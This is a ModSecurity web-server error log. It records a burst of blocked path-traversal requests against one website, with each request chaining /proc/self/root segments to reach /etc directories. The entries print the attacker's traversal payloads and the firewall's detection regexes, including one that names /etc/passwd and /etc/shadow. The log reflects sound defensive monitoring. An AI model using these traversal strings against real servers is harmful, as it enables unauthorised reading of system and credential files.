[Wed Mar 18 11:58:03.991707 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:48138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9eta6ubjKNq_cu4aoVwAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:58:09.048591 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.241.31:51402] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9gUzinOy1jxa1j4ciRAAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:58:12.667005 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:38028] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9hNa6ubjKNq_cu4aoXAAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:58:12.827963 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:54842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9hNY0UrI5A3LftIy79gAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:58:24.583574 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.243.128:33366] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9kEzinOy1jxa1j4ciVAAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:58:31.476723 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.243.128:33980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9l0zinOy1jxa1j4ciYgAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:58:38.299085 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:42408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9ntY0UrI5A3LftIy8EwAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:58:39.619390 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:34554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9n-w_le52K8_3pV3rygAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:58:40.135425 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:38034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9oOoXxyEfFpUF8f96FAAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:58:41.002185 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:34562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9oUzinOy1jxa1j4ciZQAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:58:41.435161 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:34566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9oda6ubjKNq_cu4aoZQAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:58:42.723981 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:34570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9ouyqAr6etmhZHNrP9AAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:58:44.023287 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:34582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9pOyqAr6etmhZHNrP9gAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:58:45.319025 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:34598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9pew_le52K8_3pV3rzQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:58:47.240621 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:34608] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9pta6ubjKNq_cu4aocQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:58:48.580031 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:34624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9qOyqAr6etmhZHNrP_wAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:58:49.854462 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:40598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9qeyqAr6etmhZHNrQAgAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:58:51.180866 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:40602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9q-yqAr6etmhZHNrQBAAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:58:52.516700 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:40604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9rPu8EFLIOrSqIpsQGgAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:58:53.794636 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:40614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9reoXxyEfFpUF8f96GgAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:58:55.092925 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:40618] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9r_u8EFLIOrSqIpsQHAAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:58:56.883110 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.243.128:40620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq9sEzinOy1jxa1j4cibQAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
